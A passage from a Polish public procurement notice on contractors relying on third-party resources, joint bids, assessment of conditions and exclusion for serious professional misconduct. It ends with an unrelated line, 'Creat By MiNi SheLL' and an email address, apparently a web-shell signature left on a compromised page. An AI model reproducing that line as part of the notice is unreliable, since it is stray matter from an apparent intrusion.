Wykonawca korzysta z ich potencjału w zakresie wiedzy, doświadczenia, potencjału technicznego lub osobowego, kopie dokumentów dotyczących Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty. b) w przypadku wykonawców, którzy ubiegają się samodzielnie o udzielenie zamówienia - jako Załącznik nr 1.3 . III.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (Załącznik nr 2). IV.Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem (spełnia) lub (nie spełnia), w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające, że łącznie spełniają warunki udziału w postępowaniu. V. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika - do reprezentowania ich w postępowaniu o udzielenie zamówienia - w tym złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu w imieniu i na rzecz Wykonawców wspólnie ubiegających się o udzielenie zamówienia, albo - reprezentowania w postępowaniu - w tym złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu w imieniu i na rzecz Wykonawców wspólnie ubiegających się o udzielenie zamówienia, i zawarcia umowy w sprawie zamówienia publicznego. VI. Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli zamawiający przewidział taką możliwość wykluczenia wykonawcy w ogłoszeniu o zamówieniu, w specyfikacji istotnych warunków zamówienia lub w zaproszeniu do negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com